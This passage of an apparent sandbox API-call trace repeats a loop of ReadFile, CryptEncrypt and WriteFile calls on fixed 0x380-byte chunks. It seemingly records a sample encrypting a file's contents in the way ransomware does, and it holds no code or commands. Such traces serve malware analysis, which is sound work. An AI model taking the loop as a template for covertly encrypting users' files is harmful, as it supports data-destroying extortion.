hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.429] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.429] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.429] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.429] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.429] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.430] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.430] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.430] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.430] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.430] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.430] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.430] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.430] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.430] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.430] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.430] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.430] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.430] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.430] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.431] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.431] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.431] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.431] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.431] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.431] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.431] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.431] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.431] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.431] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.431] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.432] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.432] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.432] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.432] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.432] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.432] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.432] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.432] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.432] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.432] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.432] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.433] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.433] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.433] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.433] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.433] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.433] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.433] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.433] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.433] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.433] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.433] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.433] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.434] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.434] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.434] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.434] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.434] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.434] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.434] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.434] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.434] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.434] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.434] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.434] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.434] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.435] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.435] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.435] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.435] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.435] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.435] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.435] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.435] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.435] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.435] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.435] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.435] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.435] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.436] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.436] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.436] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.436] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.436] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.436] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.436] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.436] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.436] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.436] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.436] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.436] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.436] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.437] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.437] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.437] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.437] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.437] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.437] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.437] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, 